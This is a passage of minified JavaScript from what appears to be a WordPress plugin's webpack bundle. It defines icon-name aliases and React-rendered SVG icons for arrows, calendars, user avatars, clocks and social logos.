Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};i.initializeIcons({...o.c,...r.e}),i.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_line",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const l=i.toObject(),s=((0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),l.skype_logo_icon_solid,l.link_chains_line,l.facebook_logo_icon_solid,l.twitter_x_logo_icon_line,l.tiktok_logo_icon_circle_line,l.tiktok_logo_icon_solid,l.instagram_logo_icon_solid,l.linkedin_logo_icon_solid,l.whatsapp_logo_icon_solid,l.wordpress_logo_icon_solid,l.wordpress_logo_icon_2_solid,l.youtube_logo_icon_solid,l.pinterest_logo_icon_solid,l.reddit_logo_icon_solid,l.google_logo_icon_solid,l.link_chains_line,l.share_social_solid,i.toCurrentIconObj(),l)},1900:(e,t,n)=>{"use strict";n.d(t,{e:()=>r});var a=n(7294);const r={add_plus_shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 12"})),arrow_up_top_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,a.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h2"})),category_file_documents_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,a.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 